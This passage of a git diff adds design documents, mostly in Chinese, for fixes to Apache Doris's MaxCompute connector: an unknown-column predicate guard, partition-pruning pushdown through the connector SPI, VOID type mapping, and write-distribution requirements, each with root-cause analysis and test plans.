谓词只引用已绑定的真实表列 → `get()` 实务上永不返 null。此守卫是**防御性**(defense-in-depth);触发条件需一条 bound 谓词引用 schema 外的列名(理论上不应发生)。低优、`minor`。 + +## Blast radius + +- 改动集中在连接器 `MaxComputePredicateConverter.formatLiteralValue` **一处分支**(一条 `return` → 一条 `throw`)。**无 SPI 变更、无 fe-core 改动**。 +- `convert()` 的既有顶层 `catch (Exception)`(`:91-96`)已把 `formatLiteralValue` 现有的 3 处 `throw`(非列引用 `:198`、非字面量 `:204`、不可下推类型 `:260`)统一降级为 `NO_PREDICATE`;本修新增的 throw 复用同一通道,**与方法既有契约一致**(Rule 3 surgical / Rule 11 conformance)。 +- import-gate 净(不新增任何 import;`UnsupportedOperationException` 为 `java.lang`)。 + +## Design + +**Shape:连接器局部,无 SPI / 无 fe-core 变更。** + +`MaxComputePredicateConverter.formatLiteralValue:211-213`: + +```java +OdpsType odpsType = columnTypeMap.get(columnName); +if (odpsType == null) { + throw new UnsupportedOperationException( + "Cannot push down predicate on unknown column: " + columnName); +} +``` + +- 抛 `UnsupportedOperationException`(非 legacy 的 `AnalysisException`):① 连接器禁 import fe-core(`AnalysisException` 在 fe-core,import-gate 禁);② 与**同方法**既有 3 处守卫一致(均 `UnsupportedOperationException`,Rule 11);③ `convert()` 的 catch 是 `catch (Exception)`,任何异常皆降级,类型不影响行为。 +- 行为结果:未知列谓词 → throw → `convert()` catch → `NO_PREDICATE` → 该过滤不下推、BE 兜底复算 → **结果正确**(= legacy「丢谓词」的本质不变式)。 + +### 与 legacy 的粒度差异(如实登记,Rule 12) + +legacy 的 try-catch 在 **per-doris-predicate** 粒度(`MaxComputeScanNode:309-310`),故未知列只丢**那一条**谓词、其余照常下推;新路 `convert()` 在**整个 filter 表达式**粒度(`MaxComputeScanPlanProvider:297` 一次性 convert 整树),故触发时**整树**降 `NO_PREDICATE`(全部谓词丢下推)。 + +- 此粒度差异**非本 fix 引入**:是 SPI converter 设计 + G0(datetime CST 降级、不可下推类型)既有属性,对**所有** `formatLiteralValue` throw 一致成立。 +- **correctness-safe**:无论丢一条还是整树,丢的谓词均由 BE 复算 → 结果恒正确;差异仅在**下推程度**(perf)。 +- 既然守卫**多半不可达**,触发时的 perf 退化不构成实际风险;不为此重构 converter 的 catch 粒度(Rule 2 不投机 / Rule 3 surgical)。若未来证明可达且 perf 重要,再单独提 per-conjunct 降级 issue。 + +## Risk Analysis + +- **over-rejection(误丢真谓词)**:仅当 `columnTypeMap.get(columnName)==null` 即列不在表 schema 时触发;真实 bound 谓词只引真列 → 不会误丢。✅ +- **行为回归**:修前「静默下推非法谓词」是 bug(错结果或 ODPS 报错);修后「降级 NO_PREDICATE」是 legacy parity 且 correctness-safe。无回归,纯修正。✅ +- **import-gate / SPI**:零新增 import、零 SPI 变更。✅ + +## Test Plan + +### Unit Tests(`MaxComputePredicateConverterTest`,连接器模块) + +新增针对未知列守卫的用例(Rule 9 — 钉「不下推非法谓词」不变式): + +1. **未知列比较谓词 → NO_PREDICATE**:构 `columnTypeMap` 只含已知列(如 `id`→BIGINT),对**未在 map 中**的列名(如 `ghost`)构 `ConnectorComparison(ghost == 5)`,断言 `convert(...) == Predicate.NO_PREDICATE`(修前:返回含 `ghost == "5"` 的 `RawPredicate`,断言其**非** NO_PREDICATE → 修前红 / 修后绿)。 +2. **未知列 IN 谓词 → NO_PREDICATE**:同上,`ConnectorIn(ghost IN (1,2))` → 断言 NO_PREDICATE。 +3. **已知列谓词不受影响(回归护栏)**:已知列 `id == 5` 仍正常下推为 `RawPredicate("id == 5")`(确认本修未误伤正常路径)。 + +> mutation 验证:把 fix 后的 `throw` 临时改回 `return " \"" + rawValue + "\" ";` → 用例 1/2 应变红(钉死守卫真在起作用);还原。 + +### E2E / live(真实 ODPS,CI 跳,登记 DV) + +本守卫多半不可达,无自然 live 触发路径;不新增 e2e suite。在 deviations/decisions 标注:未知列谓词下推已与 legacy 对齐(不下推非法谓词),真值由 UT + mutation 保证;live 层无回归面(正常查询不触发该分支)。 + +## 实现清单 + +1. `MaxComputePredicateConverter.java:211-213`:`return` → `throw UnsupportedOperationException`。 +2. `MaxComputePredicateConverterTest`:+3 用例(未知列 comparison / IN → NO_PREDICATE;已知列回归护栏)。 +3. 守门:编译(`-pl :fe-connector-maxcompute`)+ UT + checkstyle + import-gate + mutation(向红→还原)。 +4. 单 Agent 对抗 impl-review。 +5. 独立 `[P4-T06e]` commit + hash 回填 + tracker 更新(`task-list-batchD-redline-gaps.md` G2 行)。 diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-PRUNE-PUSHDOWN-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-PRUNE-PUSHDOWN-design.md new file mode 100644 index 00000000000000..550af3d22db294 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-PRUNE-PUSHDOWN-design.md @@ -0,0 +1,120 @@ +# P4-T06e — FIX-PRUNE-PUSHDOWN 设计文档 + +> Issue: **DG-1 / F1=F7**(`plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md` §B DG-1) +> 决策类型:**明确修复**(用户 2026-06-07 批准「Fix it」,见 task-list-P4-rereview.md P1-4) +> 跨轮更新;review 轮次见 `plan-doc/reviews/P4-T06e-FIX-PRUNE-PUSHDOWN-review-rounds.md` + +--- + +## Problem + +翻闸后 MaxCompute 走通用 `PluginDrivenScanNode` 读路径。Nereids 的分区裁剪结果(`SelectedPartitions`)**被计算出来但在 translator 被丢弃**,从未传到 ODPS read session:`MaxComputeScanPlanProvider` 永远以 `requiredPartitions=Collections.emptyList()` 建 `TableBatchReadSession` → **ODPS storage session 建在全分区上**。大分区表 SELECT 退化为整表枚举(规划慢、session+split 内存大、潜在 OOM)。 + +**非正确性 bug**:返回行仍正确(MaxCompute 未 override `applyFilter` → `convertPredicate` 不清 conjunct;`getScanNodePropertiesResult` 默认 `hasConjunctTracking=false` → `pruneConjunctsFromNodeProperties` 早退 → 全部 conjunct 序列化到 BE 重算)。**纯性能/内存回归**。3 lens 对抗复审(translator-path / spi-channel / correctness)一致无法证伪(recon workflow `wszm3u9fv`)。 + +## Root Cause + +裁剪链路三处断点(全部 file:line 核实 @2026-06-07): + +1. **translator 丢弃**:`PhysicalPlanTranslator.java:753-758`(plugin 分支)调 `PluginDrivenScanNode.create(...)` **从不**调 `setSelectedPartitions`。对比同方法 legacy 分支:Hive `:773`、legacy-MC `:797`、Hudi `:882` 均传 `fileScan.getSelectedPartitions()`。 +2. **scan node 无承接**:`PluginDrivenScanNode.java` **无** `selectedPartitions` 字段/setter;`getSplits():370-371` 调 `planScan(session, handle, columns, remainingFilter, limit)` —— SPI 5 参签名**无分区通道**。 +3. **connector 恒传空**:`MaxComputeScanPlanProvider.java:201`(标准路径)和 `:320`(limit-opt 路径)`createReadSession(..., Collections.emptyList(), ...)`。 + +**注**:FE 元数据半边 **已由 FIX-PART-GATES 落地**(`PluginDrivenExternalTable` 已 override `supportInternalPartitionPruned/getPartitionColumns/getNameToPartitionItems`,`:205-265`),故 Nereids 确实算出裁剪集——只缺 translator→SPI→connector 的端到端透传(即原 review READ-C2 修复建议的「②」半,从未实现)。connector 内部管线**已就绪**:`createReadSession` 已接 `requiredPartitions` 参并喂 `.requiredPartitions(...)`(`:244`),仅被恒喂空集。 + +**legacy 参照**(`MaxComputeScanNode.java`):`selectedPartitions` 字段(`:109`,translator `:797` 注入)→ `getSplits():718-731` 三态处理: +- `!isPruned`(`!= NOT_PRUNED`)→ `requiredPartitionSpecs` 留空 → 「读全部分区」; +- pruned 非空 → `selectedPartitions.forEach((key,v)-> add(new PartitionSpec(key)))`; +- pruned 空(`:724-727`)→ **return 空结果**(不读任何分区)。 + +## Design + +**核心思路**:复刻 legacy 三态语义,以 **additive default-method overload** 扩 SPI(零破坏其余 6 连接器),把 Nereids `SelectedPartitions` 透传到 `requiredPartitions`。「pruned 空」短路放 **fe-core**(通用、对所有 SPI 连接器有益),故 SPI 通道只需表达 null/empty=全部、非空=子集。 + +判别键 = `SelectedPartitions.isPruned`(语义等价 legacy 的 `!= NOT_PRUNED`:`NOT_PRUNED.isPruned==false`,真裁剪结果 `isPruned==true` 含可能为空的 map,见 `LogicalFileScan.java:296,309`)。 + +### 1) SPI — `ConnectorScanPlanProvider`(fe-connector-api) +新增 6 参 `default` overload,**镜像既有 5 参 limit overload 模式**(`:82-89`),默认忽略分区委托回 5 参: +```java +default List planScan( + ConnectorSession session, ConnectorTableHandle handle, + List columns, Optional filter, + long limit, List requiredPartitions) { + return planScan(session, handle, columns, filter, limit); +} +``` +**契约**(javadoc 明确):`requiredPartitions` = 已裁剪分区名列表(如 `"pt=1,region=cn"`,即 `SelectedPartitions.selectedPartitions` 的 keySet,连接器侧 `new PartitionSpec(name)` 可解析)。`null`/空 = 不裁剪/读全部分区;非空 = 仅读这些分区。**「裁剪为零分区」由 fe-core 在调 planScan 前短路,永不到达 SPI**。 + +### 2) MaxCompute — `MaxComputeScanPlanProvider` +- 把现 5 参 `planScan` body 上移为 **6 参 override**(真实现),threading `requiredPartitions`;5 参 → 委托 6 参传 `null`(保持 passthrough / TVF 等其它调用方零变更);4 参不变(委托 5 参)。 +- 新增 package-private static helper `toPartitionSpecs(List)` → `List`(null/空→`emptyList`,逐项 `new PartitionSpec(name)`,与 legacy `MaxComputeScanNode:729` 同款转换)。 +- 标准路径 `createReadSession(..., toPartitionSpecs(requiredPartitions), splitOptions)`(替 `:201` 的 emptyList)。 +- limit-opt 路径:`planScanWithLimitOptimization` 加 `List requiredPartitions` 形参,内部 `createReadSession(..., toPartitionSpecs(requiredPartitions), rowOffsetOptions)`(替 `:320` 的 emptyList)。**对齐 legacy**:legacy limit-opt(`getSplitsWithLimitOptimization(requiredPartitionSpecs)` @`:737`)同样接收裁剪集。 + +### 3) fe-core — `PluginDrivenScanNode` +- 新增字段 `private SelectedPartitions selectedPartitions = SelectedPartitions.NOT_PRUNED;`(默认 NOT_PRUNED → 未注入时行为不变)+ setter。import `org.apache.doris.nereids.trees.plans.logical.LogicalFileScan.SelectedPartitions`(fe-core 内部跨包,import-gate 不涉及)。 +- 新增 package-private static 纯函数(可单测): +```java +static List resolveRequiredPartitions(SelectedPartitions sp) { + if (sp == null || !sp.isPruned) { + return null; // 未裁剪 → 读全部 + } + return new ArrayList<>(sp.selectedPartitions.keySet()); // 空=裁剪为零;非空=子集 +} +``` +- `getSplits()` 内(call planScan 前): +```java +List requiredPartitions = resolveRequiredPartitions(selectedPartitions); +if (requiredPartitions != null && requiredPartitions.isEmpty()) { + return Collections.emptyList(); // 裁剪为零分区,无需读 (镜像 legacy MaxComputeScanNode:724-727) +} +... scanProvider.planScan(connectorSession, currentHandle, columns, remainingFilter, limit, requiredPartitions); +``` + +### 4) fe-core — `PhysicalPlanTranslator`(plugin 分支 `:753-758`) +```java +PluginDrivenScanNode pluginScanNode = PluginDrivenScanNode.create(...); +pluginScanNode.setSelectedPartitions(fileScan.getSelectedPartitions()); +scanNode = pluginScanNode; +``` +无条件设(非分区表 Nereids 给 NOT_PRUNED → 无效果,与 Hive/legacy-MC 一致)。 + +## Implementation Plan +1. [fe-connector-api] `ConnectorScanPlanProvider`:+6 参 default overload + javadoc 契约。 +2. [fe-connector-maxcompute] `MaxComputeScanPlanProvider`:5 参 body→6 参 override;5 参委托;`toPartitionSpecs`;两处 `createReadSession` threading;`planScanWithLimitOptimization` 加形参。 +3. [fe-core] `PluginDrivenScanNode`:字段+setter+`resolveRequiredPartitions`+`getSplits` 短路与 6 参调用。 +4. [fe-core] `PhysicalPlanTranslator`:plugin 分支注入。 +5. 测试见下。 + +## Risk Analysis +- **blast radius 最小**:SPI 加 default 方法,es/jdbc/hive/paimon/hudi/trino **零改**(继承 default 委托回原 5 参)。唯一 override = MaxCompute。既有 4/5 参调用方(含 `EsScanPlanProviderTest`、passthrough TVF)不变。 +- **parity 风险**:`toPartitionSpecs` 与 legacy `new PartitionSpec(key)` 逐字同款;三态判别用 `isPruned` 语义等价 legacy `!= NOT_PRUNED`。短路位置从 connector 上移到 fe-core,对 MaxCompute 行为等价(legacy 短路也在 fe-core scan node)。 +- **null/empty 语义**:SPI 契约明确 null/空=全部、非空=子集、零分区 fe-core 短路不下达。`toPartitionSpecs` 对 null/空容错→emptyList→读全部(= 旧行为,回退安全)。 +- **scope 边界**:仅 `visitPhysicalFileScan` plugin 分支(MaxCompute 路径)。**Hudi-SPI plugin 分支(`visitPhysicalHudiScan:861`)本次不接**——Hudi 连接器 live 翻闸前 deferred(DV-006),且其 provider 走 default 忽略 requiredPartitions;登记为已知 scope 边界(非本 fix 引入的回归)。 +- **batch-mode(NG-7/P3)解耦**:本 fix 只恢复 requiredPartitions 下推,不引入 SPI batch 路径(async by-spec split)。NG-7 仍为独立 P3,但本 fix 是其前置(裁剪集到位后 batch-by-spec 才有意义)。 + +## Test Plan + +### Unit Tests +- **fe-core** `PluginDrivenScanNodePartitionPruningTest`(`org.apache.doris.datasource`,直调 package-private `resolveRequiredPartitions`,直构 `SelectedPartitions`): + - `NOT_PRUNED` → `null`(**WHY**:未裁剪须读全部,不可误传空集致短路丢数据); + - `isPruned` + map{`pt=1`,`pt=2`} → `["pt=1","pt=2"]`(**WHY**:裁剪子集须下推,否则全表扫回归); + - `isPruned` + 空 map → 空 list(**WHY**:裁剪为零须可被短路识别,区别于「读全部」的 null)。 + - mutation:去 `isPruned` 判别(恒返回 names)→ NOT_PRUNED case 红;恒返回 null → 子集 case 红。 +- **fe-connector-maxcompute** `MaxComputeScanPlanProviderTest`(同包直调 package-private `toPartitionSpecs`;连接器模块无 fe-core/Mockito,纯转换免网络): + - `null`→空、`[]`→空、`["pt=1"]`→`[PartitionSpec("pt=1")]`(**WHY**:分区名→ODPS spec 转换是下推到 read session 的唯一桥;null/空容错保旧「读全部」行为)。 + - mutation:转换体改为恒 emptyList → `["pt=1"]` case 红。 + +### E2E Tests +本轮流程 = **编译+UT(无 e2e)**。live e2e(真实 ODPS)为翻闸真值门,**本 fix 必经**但非本轮执行: +- p2 `test_mc_read_*` 分区裁剪:`WHERE pt='x'` EXPLAIN/profile 仅扫目标分区(split 数/规划耗时 ≪ 全表); +- `WHERE pt='不存在'` 返回 0 行且**不**建全分区 session(短路)。 +- 登记为 **DV-015** 真值门(同 P0-3 DV-014:bind 投影无 fe-core analyze harness,靠 live 覆盖)。 + +## Batch-D 红线 +删 legacy `MaxComputeScanNode` 须待本 fix 落(它是分区裁剪下推唯一逻辑副本之一;连同写侧 `PhysicalMaxComputeTableSink`/`bindMaxComputeTableSink`/`allowInsertOverwrite` MC 分支)。复查 Batch-D「zero survivor」声明含本节点的读裁剪。 + +## doc-sync(随 commit 或横切) +- **更正证伪声明**:`P4-T06d-FIX-PART-GATES-design.md:99-104`(「fe-core only / 不涉及 fe-connector」——实则缺 connector 透传半边)、`P4-T06d-FIX-PART-GATES-review-rounds.md:11-12,42-44`(「pruning 不变式 clean / production CLEAN」——证伪)、`decisions-log.md` D-028(「分区裁剪恢复」叙事只成立元数据半边)。 +- **登记**:deviations-log **DV-015**(本轮前裁剪未端到端、本 fix 恢复;live e2e 真值门);decisions-log 新条(additive 6 参 SPI overload + 三态语义 + 短路位置)。 +- 更新 `task-list-P4-rereview.md`(P1-4 行 + 累计结论)、`HANDOFF.md`。 diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-VOID-TYPE-MAPPING-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-VOID-TYPE-MAPPING-design.md new file mode 100644 index 00000000000000..e320692ef97c63 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-VOID-TYPE-MAPPING-design.md @@ -0,0 +1,102 @@ +# [P4-T06e] FIX-VOID-TYPE-MAPPING (GAP7) — design + +> 来源:Batch-D 红线扩充对抗复审 workflow `wbw4xszrg`(GAP7,Tier 2,minor)。 +> 关联:legacy 对照 `MaxComputeExternalTable.mcTypeToDorisType`(VOID→`Type.NULL`;default→hard-throw);`ScalarType.createType:241`(认 `"NULL_TYPE"`→NULL,不认 `"NULL"`);`ConnectorColumnConverter.convertScalarType`(无 "NULL" case、catch→UNSUPPORTED)。 + +## Problem + +翻闸后 ODPS `VOID` 列类型映为 **UNSUPPORTED**(legacy=`Type.NULL`)。链(已核码): +- `MCTypeMapping.toConnectorType:51-52`:`case VOID: return ConnectorType.of("NULL")`——emit token **"NULL"**。 +- fe-core `ConnectorColumnConverter.convertScalarType`:**无 "NULL" case** → 落 default `ScalarType.createType("NULL")`。 +- `ScalarType.createType:237-299`:只认 **"NULL_TYPE"**→`Type.NULL`(:241),**"NULL"** 落 default → `Preconditions.checkState(false)` **抛** → 被 convertScalarType catch → **`Type.UNSUPPORTED`**。 + +净:VOID 列静默成 UNSUPPORTED(legacy 为可用的 `Type.NULL`)。 + +**次生缺陷**(HANDOFF 标记):未知 OdpsType 处置分歧。`MCTypeMapping.toConnectorType:99-100` `default: return of("UNSUPPORTED")`(**静默**);legacy `mcTypeToDorisType` default `throw IllegalArgumentException("Cannot transform unknown type: ...")`(**硬抛 fail-fast**)。 + +## Root Cause(已核码确认) + +| # | 位置 | 现状 | legacy parity | +|---|---|---|---| +| 1 | `MCTypeMapping.toConnectorType:52` | `of("NULL")` | VOID→`Type.NULL`(token 须为 `ScalarType.createType` 认的 `"NULL_TYPE"`) | +| 2 | `ConnectorColumnConverter.convertScalarType` | 无 "NULL" case,default `createType(name)` catch→UNSUPPORTED | — (token 修对后此处直接 `createType("NULL_TYPE")`→`Type.NULL`,无需改 fe-core) | +| 3 | `ScalarType.createType:241` | `case "NULL_TYPE": return NULL`;`"NULL"` 落 default 抛 | — | +| 4 | `MCTypeMapping.toConnectorType:99-100` | `default: return of("UNSUPPORTED")`(静默) | legacy default **hard-throw** | + +**为何 CI 没抓**:连接器 `MCTypeMapping.toConnectorType` 无 UT(仅反向 `toMcType` 间接经 validateColumns 测);live e2e 无 VOID 列覆盖。 + +## Blast radius + +- 改动集中在连接器 `MCTypeMapping.toConnectorType`(VOID token + default throw)。**无 SPI 变更、无 fe-core 改动**(token 修对后 fe-core `convertScalarType` default 即正确处理 "NULL_TYPE"→Type.NULL)。 +- VOID token 改 "NULL"→"NULL_TYPE":仅影响 ODPS VOID 列读路径 schema 映射(→ Type.NULL,legacy parity)。 +- default throw:BINARY/INTERVAL_DAY_TIME/INTERVAL_YEAR_MONTH 已是**显式** UNSUPPORTED case(:95-98),JSON 显式 UNSUPPORTED(:75-76),其余已知列类型皆有显式 case → **不受 default 影响**。`default` 仅被 `OdpsType.UNKNOWN`(ODPS SDK sentinel,非真实列类型;经 `TypeInfoFactory.UNKNOWN` 可构造)+ 未来未知 OdpsType 命中;legacy 对 UNKNOWN 亦无 case → 同样 throw(`MaxComputeExternalTable:294`)→ 故 fix-2 = legacy parity,真实表已知列类型零回归。 +- import-gate 净(仅用连接器内 `DorisConnectorException`,已 import :21)。 +- **out-of-scope(不改,Rule 3)**:ES 连接器 `EsTypeMapping:191` 亦 emit `of("NULL")`(同款 latent token bug),但 ES 非本翻闸/本 issue 范围,留。 + +## Design + +**Shape:连接器局部,无 SPI / 无 fe-core 变更。** + +### fix-1(primary,VOID token):`MCTypeMapping.toConnectorType:52` + +```java +case VOID: + return ConnectorType.of("NULL_TYPE"); // 原 "NULL" +``` + +`"NULL_TYPE"` = `ScalarType.createType` 唯一认得、产 `Type.NULL` 的 token(:241)。fe-core `convertScalarType` default 即 `createType("NULL_TYPE")`→`Type.NULL`(不抛、不 catch、不降 UNSUPPORTED)。VOID→Type.NULL = legacy parity。**所有其它 MCTypeMapping token 已与 `ScalarType.createType` token 精确匹配,本修使 VOID 亦一致。** + +### fix-2(secondary defect,default fail-fast):`MCTypeMapping.toConnectorType:99-100` + +```java +default: + throw new DorisConnectorException( + "Cannot transform unknown MaxCompute type: " + odpsType); // 原 return of("UNSUPPORTED") +``` + +镜像 legacy `mcTypeToDorisType` default hard-throw(legacy :294)。**安全性**:BINARY/INTERVAL_*/JSON 等已知-不支持类型均**显式** UNSUPPORTED case(:75-76, :95-98)、不受影响;default 仅被 `OdpsType.UNKNOWN`(SDK sentinel)+ 未来未知类型命中——legacy 对 UNKNOWN 同样 throw(无 case)→ parity;真实表已知列类型零回归。 + +**决策(已定,供 user veto)**:fix-2 纳入。理由:① campaign 目标 = legacy parity(legacy 对 UNKNOWN throw);② CLAUDE.md Rule 12「Fail loud」(静默 UNSUPPORTED 掩盖未知类型问题);③ 用户本 campaign 一贯取 full parity(G8/P2-8/G5);④ 真实表已知列类型零回归。**可 UT 覆盖**:`OdpsType.UNKNOWN`(经 `TypeInfoFactory.UNKNOWN`)落 default → assertThrows(legacy 对 UNKNOWN 同 throw)。若 user 倾向「保留 graceful UNSUPPORTED 降级」则单删 fix-2(一行 revert),不影响 fix-1。 + +## Implementation Plan + +1. `MCTypeMapping.toConnectorType`:VOID `of("NULL")`→`of("NULL_TYPE")`(fix-1);default `return of("UNSUPPORTED")`→`throw DorisConnectorException`(fix-2)。 +2. **新增 UT** `MCTypeMappingTest`(连接器模块,纯 JUnit,用 `TypeInfoFactory` 构造 TypeInfo)——见 Test Plan。 +3. 守门:编译 + UT + checkstyle + import-gate + mutation。 + +## Risk Analysis + +| Risk | Mitigation | +|---|---| +| "NULL_TYPE" 下游不被认 | 已核 `ScalarType.createType:241` `case "NULL_TYPE": return NULL`;convertScalarType default 直接 createType、无 catch 命中。 | +| default throw 误伤已知-不支持类型 | BINARY/INTERVAL_*/JSON 均显式 UNSUPPORTED case;default 当前不可达(23 已知类型全显式)→ 零现表回归。UT 钉 BINARY→UNSUPPORTED(证显式 case 未被 throw 吞)。 | +| ARRAY/MAP/STRUCT 元素为 VOID | 复用同 `toConnectorType` → 元素 VOID 亦正确成 "NULL_TYPE"(嵌套递归一致)。 | +| fix-2 无 UT 覆盖 | 透明声明(default 当前不可达、不可触发);不伪造覆盖。Rule 9/12。 | + +## Test Plan + +钉 **WHY**(Rule 9):VOID 须映为下游产 `Type.NULL` 的 token(legacy parity),否则静默成 UNSUPPORTED(列不可用)。 + +### Unit Tests(新增 `MCTypeMappingTest`,连接器模块,纯 JUnit) + +1. **VOID→"NULL_TYPE"(核心)**:`toConnectorType(TypeInfoFactory.VOID)` → `getTypeName()=="NULL_TYPE"`。MUTATION:还原 `of("NULL")` → 红。 +2. **VOID 嵌套**:ARRAY → 元素 ConnectorType typeName=="NULL_TYPE"(证递归一致)。 +3. **BINARY→"UNSUPPORTED"**(守 fix-2 不误伤):`toConnectorType(TypeInfoFactory.BINARY)` → "UNSUPPORTED"(**不**抛)。证已知-不支持类型仍走显式 UNSUPPORTED case、未被 default throw 吞。 +4. **UNKNOWN→throw(fix-2)**:`toConnectorType(TypeInfoFactory.UNKNOWN)`(OdpsType.UNKNOWN 落 default)→ `assertThrows(DorisConnectorException)`、msg 含 "unknown"。证 fail-fast = legacy parity。 +5. **smoke 已知类型**:INT→"INT"、STRING→"STRING"、BOOLEAN→"BOOLEAN"(防 token 漂移)。 + +### mutation(守门) +- M1:VOID token "NULL_TYPE"→"NULL" → test-1/2 红。 +- M2:default `throw`→`return of("UNSUPPORTED")` → UNKNOWN 测(assertThrows)变红。 + +### E2E(CI 跳,真实 ODPS = 真值闸,登记 DV) +- ODPS VOID 列表 `DESCRIBE` / `SELECT` → 列类型为 NULL(非 UNSUPPORTED),可查。需用户 live 跑。 + +## 决策类型 + +明确修复(用户定 Fix,Tier 2 minor)。连接器局部、无 SPI/fe-core 变更、与 legacy `MaxComputeExternalTable.mcTypeToDorisType` 达成 parity(VOID→Type.NULL + unknown→fail-fast)。 + +**设计内决策(供 impl-review / user veto)**: +- VOID 取 Option A(连接器 token "NULL_TYPE")而非 Option B(fe-core 加 "NULL" case)——更 surgical、token 拼写 canonical、不教 fe-core 连接器专有错拼。 +- fix-2(secondary default throw)纳入(parity + Rule 12 fail-loud + 零现表风险);透明声明不可 UT 覆盖。 +- ES `EsTypeMapping:191` 同款 token bug out-of-scope(Rule 3)。 diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-WRITE-DISTRIBUTION-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-WRITE-DISTRIBUTION-design.md new file mode 100644 index 00000000000000..eba47794cb9148 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-WRITE-DISTRIBUTION-design.md @@ -0,0 +1,367 @@ +# FIX-WRITE-DISTRIBUTION (P4-T06e, P0-2) — design + +> 8th cutover-fix. Scope: fe-core (planner sink + plugin table) + fe-connector-api (1 enum +> value) + fe-connector-maxcompute (1 capability override). Surgical (Rule 3). +> Source: clean-room re-review NG-2 / NG-4 (= F17 / F18 / F43) +> (`plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md`, §A.NG-2/NG-4, §C domain-2/6, §E#2/#4). +> High confidence; **live e2e against real ODPS is the real truth-gate** (CI-skipped). + +## Problem + +After the MaxCompute SPI cutover, a MaxCompute write goes through the generic +`PhysicalConnectorTableSink` instead of legacy `PhysicalMaxComputeTableSink`. The generic sink's +`getRequirePhysicalProperties()` collapses *all* write distribution to a single boolean: + +```java +// PhysicalConnectorTableSink.java:114-121 (current) +@Override +public PhysicalProperties getRequirePhysicalProperties() { + if (targetTable instanceof PluginDrivenExternalTable + && ((PluginDrivenExternalTable) targetTable).supportsParallelWrite()) { + return PhysicalProperties.SINK_RANDOM_PARTITIONED; + } + return PhysicalProperties.GATHER; +} +``` + +`MaxComputeDorisConnector` declares **no** capabilities (`getCapabilities()` inherits the empty +default — verified `MaxComputeDorisConnector.java`, no override), so `supportsParallelWrite()` is +**false** → every MaxCompute write falls to **GATHER** (single writer). This produces two +regressions versus legacy: + +- **NG-2 (blocker, F17):** a **dynamic-partition** INSERT loses the **hash-by-partition + mandatory + local-sort** that legacy `PhysicalMaxComputeTableSink.getRequirePhysicalProperties():111-155` + enforced. The MaxCompute Storage API streams partition writers and **closes the previous partition + writer the moment it sees a different partition value**; un-grouped (unsorted) multi-partition rows + trigger BE `"writer has been closed"` errors. (Legacy comment at `:144-147` documents exactly this.) +- **NG-4 (major, F18):** **non-partitioned / all-static** MaxCompute writes degrade from + `SINK_RANDOM_PARTITIONED` (multiple parallel writers, legacy) to **GATHER** (single writer) → + write-throughput regression. + +Legacy `PhysicalMaxComputeTableSink.getRequirePhysicalProperties()` is a clean 3-branch: + +| case | legacy output | +|---|---| +| has partition cols **and** a partition col present in `cols` (dynamic) | `DistributionSpecHiveTableSinkHashPartitioned(partitionExprIds)` + `MustLocalSortOrderSpec(partitionOrderKeys)` | +| has partition cols, none present in `cols` (all static) | `SINK_RANDOM_PARTITIONED` | +| no partition cols | `SINK_RANDOM_PARTITIONED` | + +The generic sink reproduces **none** of branch-1's hash+local-sort and reaches RANDOM only behind a +capability MaxCompute never declares. + +## Root Cause + +`PhysicalConnectorTableSink` was cloned from JDBC/ES write semantics (single transactional writer, +no partitions). It models exactly one knob — `supportsParallelWrite()` → RANDOM-vs-GATHER — and has +**no channel** for a connector to declare the MaxCompute-style requirement *"dynamic-partition writes +must be hash-distributed and locally sorted by partition columns."* The legacy logic lived in the +MaxCompute-specific `PhysicalMaxComputeTableSink`, which the cutover stopped instantiating; the +distribution/sort knowledge was never ported into the generic sink or surfaced through the SPI. This +is the write-path face of the recurring "half-wired dispatch" (re-review §C domain-6): the read/DDL +dispatch was generalized, the write *distribution* was not. + +## Design + +### Two orthogonal connector signals → two capabilities + +The legacy 3-branch needs exactly two connector-declared facts, which I map to **`ConnectorCapability` +enum** values read through `connector.getCapabilities()` — the *same* mechanism the sibling +`supportsParallelWrite()` already uses (read in this very method), so both reads are uniform and +require no `ConnectorSession`/metadata construction in the planner property-derivation hot path: + +1. **`SUPPORTS_PARALLEL_WRITE`** (already exists, `ConnectorCapability.java:51`) — "multiple + concurrent writers are safe." Drives the non-partition / all-static → `SINK_RANDOM_PARTITIONED` + branch. **MaxCompute must now declare it** (fixes NG-4). Read via the existing + `PluginDrivenExternalTable.supportsParallelWrite()`. +2. **`SINK_REQUIRE_PARTITION_LOCAL_SORT`** (NEW enum value) — "dynamic-partition writes must be + hash-distributed and locally sorted by partition columns" (the MaxCompute Storage-API streaming + constraint). Drives branch-1. **MaxCompute declares it** (fixes NG-2). Read via a new + `PluginDrivenExternalTable.requirePartitionLocalSortOnWrite()`. + +Default for the new capability is **absent/false** → no behavior change for any other connector +(jdbc/es/trino: neither capability → still GATHER), mirroring the FIX-OVERWRITE-GATE +default-false-opt-in philosophy. The two capabilities are intended to be declared **together** by a +partition-writing connector (hash distribution is inherently parallel); the sink does not force that +pairing (branch-1 keys only on the local-sort capability, faithful to legacy's unconditional +dynamic→hash+sort), but the design note records the intended pairing. + +### The fe-core sink logic — **critical correction vs legacy: index by `cols`, not full-schema** + +> ⚠️ **SUPERSEDED by P0-3 / FIX-BIND-STATIC-PARTITION ([D-030], 2026-06-07).** This section's "index by +> `cols`" decision was **reverted to legacy full-schema indexing**. Reason: P0-3 makes +> `bindConnectorTableSink` project the child to **full-schema** order for positional-write connectors +> (MaxCompute, gated by capability `SINK_REQUIRE_FULL_SCHEMA_ORDER`), so `child().getOutput()` is again +> aligned with `table.getFullSchema()` — *not* `cols` (cols excludes static partition cols and may be +> user-reordered). `cols`-indexing silently shuffled by the wrong column in the partial-static and +> reordered-explicit-list cases. The "`cols.size() == child output size`" invariant below holds only for +> the non-positional (JDBC/ES) path. See `reviews/P4-T06e-FIX-BIND-STATIC-PARTITION-review-rounds.md`. + +The generic sink's `getRequirePhysicalProperties()` reproduces the legacy 3-branch, **but the +partition-column → child-output index mapping MUST differ from legacy.** This is the single most +important correctness point of this fix: + +- Legacy `bindMaxComputeTableSink` (`BindSink.java:904-906`) projects the child to 